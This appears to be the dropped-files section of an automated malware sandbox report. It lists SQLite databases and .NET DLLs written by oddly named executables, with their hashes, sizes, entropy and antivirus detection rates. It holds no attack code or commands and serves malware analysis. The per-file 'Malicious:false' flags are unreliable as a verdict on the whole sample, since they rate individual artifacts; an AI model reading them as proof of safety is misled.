                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: VqGD18ELBM.exe, Detection: malicious
                                                                                                                                                                  • Filename: updIMdPUj8.exe, Detection: malicious
                                                                                                                                                                  • Filename: t8F7Ic986c.exe, Detection: malicious
                                                                                                                                                                  • Filename: 544WP3NHaP.exe, Detection: malicious
                                                                                                                                                                  • Filename: eP6sjvTqJa.exe, Detection: malicious
                                                                                                                                                                  • Filename: 1znAXdPcM5.exe, Detection: malicious
                                                                                                                                                                  • Filename: YGk3y6Tdix.exe, Detection: malicious
                                                                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious
                                                                                                                                                                  • Filename: voed9G7p5s.exe, Detection: malicious
                                                                                                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23552
                                                                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64000
                                                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
